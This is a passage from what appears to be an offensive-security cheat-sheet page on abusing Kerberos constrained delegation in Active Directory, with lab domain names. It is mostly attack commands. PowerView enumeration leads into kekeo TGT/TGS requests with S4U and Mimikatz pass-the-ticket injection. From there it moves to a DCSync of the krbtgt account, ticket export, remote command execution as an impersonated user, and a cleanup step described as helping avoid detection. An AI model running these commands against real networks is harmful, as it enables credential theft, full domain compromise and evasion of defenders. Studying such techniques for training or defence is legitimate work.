AuthorDiscordHTB Pro LabsHTB CPTSHTB CDSA

🟢Constrained Delegation

Dive into our comprehensive article exploring the intricacies of Constrained Delegation. Uncover its functions, role, and understanding its impact for an effective system management strategy.

Enumerate users with contrained delegation enabled

Get-DomainUser -TrustedToAuth
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

Enumerate computers with contrained delegation enabled

Get-Domaincomputer -TrustedToAuth
Get-Domaincomputer -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

Constrained delegation User

Requesting TGT with kekeo

./kekeo.exe
Tgt::ask /user:<username> /domain:<domain> /rc4:<hash>

Requesting TGS with kekeo

Tgs::s4u /tgt:<tgt> /user:Administrator@<domain> /service:cifs/dcorp-mssql.dollarcorp.moneycorp.local

Use Mimikatz to inject the TGS ticket

Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'

Constrained delegation Computer

Requesting TGT with a PC hash

./kekeo.exe
Tgt::ask /user:dcorp-adminsrv$ /domain:<domain> /rc4:<hash>

Requesting TGS

No validation for the SPN specified

Tgs::s4u /tgt:<kirbi file> /user:Administrator@<domain> /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL

Using mimikatz to inject TGS ticket and executing DCsync

Invoke-Mimikatz -Command '"Kerberos::ptt <kirbi file>"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<shortdomain>\krbtgt"'

Additional Enumeration Techniques

Discover additional services allowing delegation:

Get-ADObject -Filter {msDS-AllowedToActOnBehalfOfOtherIdentity -ne '$null'} -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

Further Exploitation

Extract and Use TGT

Using the extracted TGT for impersonation:

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Then, using the ticket:

Invoke-Mimikatz -Command '"kerberos::ptt <path to .kirbi ticket>"'

Execute Commands with the Impersonated Identity

Once ticket is injected, use it to execute commands:

Invoke-Command -ScriptBlock { whoami; Get-Process } -Credential $cred -ComputerName

Where $cred is a PSCredential object created with the credentials of any user you've impersonated.

Cleaning Up

Remember to remove any traces of your activities:

Invoke-Mimikatz -Command '"kerberos::purge"'

This ensures the removal of all Kerberos tickets from the current session and helps avoid detection.

Additional Resources

For more information on Kerberos delegation and related attacks, refer to the following resources:

PreviousUnconstrained DelegationNextDNS Admins

Last updated

Was this helpful?